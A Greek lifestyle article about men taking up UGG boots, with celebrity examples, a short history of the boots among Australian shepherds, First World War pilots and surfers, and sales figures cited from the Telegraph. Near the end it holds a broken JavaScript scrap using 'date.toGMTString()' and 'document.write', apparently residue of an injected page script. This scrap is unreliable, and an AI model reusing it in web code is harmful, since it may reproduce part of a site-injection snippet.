Άνδρες με UGG!

Ερώτηση σε άνδρα : Θα φόραγες ένα ζευγάρι UGG ;

Η πρώτη ενστικτώδης αντίδραση του είναι «μα είναι γυναικείες».

Για περίμενε όμως: εσύ δεν έλεγες πως αυτές οι μπότες δεν είναι καθόλου θηλυκές;

Κι όμως στους δρόμους του Λος Άντζελες και της Νέας Υόρκης, τα ανδρικά πόδια με Ugg αυξάνονται γεωμετρικά. Ολοένα και περισσότεροι άνδρες celebrities καλωσορίζουν αυτή τη ζεστή, χνουδωτή αίσθηση στην καθημερινότητά τους. Ακόμη και στο ελληνικό twitter έχουν ήδη αναφερθεί τα πρώτα «κρούσματα» σε Αθήνα και Θεσσαλονίκη. Γιατί όμως η εικόνα ενός άνδρα με Ugg σού «κλωτσάει» τόσο πολύ; Κάθε φορά που στο παρελθόν διαμαρτυρόσουν ότι αυτά τα παπούτσια δεν είναι καθόλου θηλυκά, είναι σαν να εννοούσες πως είναι αρρενωπά. Και είχες δίκιο. Όχι μόνο είναι αρρενωπά, αλλά κάποτε άνηκαν στους άνδρες. Και σε αυτούς θέλουν τώρα να επιστρέψουν.

Δείτε λοιπόν διάσημους και όχι μόνο με UGG!

Justin Timberlake, Ben Affleck, Leonardo di CaprioJustin Timberlake, Ben Affleck, Leonardo di Caprio

Και για την ιστορία…

Από τους βοσκούς και τους πιλότους…

Στις αρχές του 20ου αιώνα, γιδοβοσκοί στα βουνά της Αυστραλίας συνέλεγαν το μαλλί των προβάτων και έφτιαχναν αυτές τις χνουδωτές sheepskin μπότες για να κρατιούνται ζεστοί στα βουνά. Η κατασκευή τους ήταν απλή, το σχέδιο τους λιτό και η ζεστασιά που προσέφεραν ασυναγώνιστη, με αποτέλεσμα να βρουν σύντομα απήχηση και σε άλλους άντρες, όπως στους πιλότους του Α’ Παγκόσμιου Πολέμου, οι οποίοι τις φορούσαν στα μεγάλα υψόμετρα για να κρατούν τα πόδια τους ζεστά μέσα στο παγωμένο cockpit. Εκείνοι, όμως, που ουσιαστικά τις αποθέωσαν ήταν οι σέρφερ στις ακτές της Αυστραλίας και αργότερα της Καλιφόρνια. Αυτά τα ηλιοκαμένα αγόρια με τις ανταύγειες και το six pack, ήθελαν να χώσουν κάπου στεγνά και ζεστά τις πατούσες τους μετά από πολύωρα παιχνίδια στα κύματα. Οι Ugg έμοιαζαν ιδανικές.

Για τα στατιστικά…

Σύμφωνα με την εφημερίδα Telegraph, oι αντρικές Ugg προς το παρόν αντιπροσωπεύουν μόνο το 10%-12% των συνολικών πωλήσεων, όμως η εταιρία είναι αισιόδοξη πως αυτό σύντομα θα αλλάξει. Για την καμπάνια Άνοιξη/ Καλοκαίρι 2012 επιστράτευσε τον δημοφιλή παίκτη του NFL (και σύζυγο της Gisele) Tom Brady, προσπαθώντας να  πει στους άνδρες «εδώ φοράει Ugg αυτός ο ωραίος τύπος που έχει ρίξει μια από τις ωραιότερες γκόμενες του πλανήτη, εσύ θα αντισταθείς;».
Πληροφορίες από oneman.gr
t;+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply